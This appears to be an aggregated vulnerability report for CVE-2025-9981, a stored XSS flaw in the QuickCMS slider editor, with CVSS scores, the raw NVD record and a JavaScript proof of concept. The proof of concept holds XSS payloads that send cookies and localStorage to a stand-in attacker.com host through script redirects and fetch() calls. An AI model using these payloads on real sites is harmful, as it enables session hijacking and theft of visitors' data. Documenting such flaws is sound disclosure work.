Security Vulnerability Report
CVE-2025-9981 CVSS 4.8 MEDIUM


Published: 2025-10-23 10:15:33
Last Modified: 2025-11-17 15:57:34

Description

QuickCMS is vulnerable to multiple Stored XSS issues in the slider editor functionality (sliders-form). A malicious attacker with admin privileges can inject arbitrary HTML and JS into the website, which will be rendered/executed on every page. By default, an admin user is not able to add JavaScript to the website.

The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE
QuickCMS 6.8 (confirmed affected)
QuickCMS other versions (possibly affected, untested)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-9981 PoC - Stored XSS in QuickCMS Slider Editor
// Target: QuickCMS <= 6.8 sliders-form endpoint

// Step 1: Authenticate as admin
const loginEndpoint = 'http://target.com/admin/login.php';
const credentials = { username: 'admin', password: 'admin123' };

// Step 2: Inject XSS payload via slider editor
const xssPayload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>';
const sliderFormEndpoint = 'http://target.com/admin/sliders-form.php';
const maliciousSlider = {
  name: 'Malicious Slider',
  description: xssPayload, // XSS payload injection point
  content: '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">'
};

// Step 3: Submit the malicious slider
// POST request to sliders-form.php with crafted parameters
// Payload will be stored and executed on all pages displaying the slider

// Alternative payload for stealing admin session:
const sessionHijackPayload = `
<img src=x onerror="
  fetch('https://attacker.com/api/log', {
    method: 'POST',
    body: JSON.stringify({ cookies: document.cookie, localStorage: localStorage, url: window.location.href })
  })
">
`;

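References

https://cert.pl/posts/2025/10/CVE-2025-9980 (Third Party Advisory)
https://opensolution.org/cms-system-quick-cms.html (Product)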

Raw JSON Data

{"cve": {"id": "CVE-2025-9981", "sourceIdentifier": "[email protected]", "published": "2025-10-23T10:15:32.743", "lastModified": "2025-11-17T15:57:33.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in slider editor functionality (sliders-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/10/CVE-2025-9980", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}